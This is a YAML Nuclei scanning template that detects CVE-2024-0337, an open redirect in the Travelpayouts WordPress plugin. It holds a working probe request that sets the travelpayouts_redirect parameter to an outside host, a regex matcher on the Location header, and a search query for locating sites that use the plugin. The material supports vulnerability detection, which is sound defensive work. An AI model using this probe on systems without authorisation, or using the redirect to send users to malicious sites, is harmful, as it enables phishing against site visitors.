34 lines
1.3 KiB
YAML
34 lines
1.3 KiB
YAML
id: CVE-2024-0337
|
|
|
|
info:
|
|
name: Travelpayouts <= 1.1.16 - Open Redirect
|
|
author: Kazgangap
|
|
severity: medium
|
|
description: |
|
|
The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-0337
|
|
classification:
|
|
cve-id: CVE-2024-0337
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.07895
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
publicwww-query: inurl:"/wp-content/plugins/travelpayouts"
|
|
tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?travelpayouts_redirect=https://oast.me"
|
|
|
|
redirects: true
|
|
max-redirects: 2
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
|
|
# digest: 4a0a004730450220181582ac93b72f27e977d2061f18ff05e3b5df811283cea693e6f70459ab7fb90221008a49810c8b6636aaef8a8678a28ed5d5204efe8af7cdfd25e42fee1f0617dea0:922c64590222798bb761d5b6d8e72950 |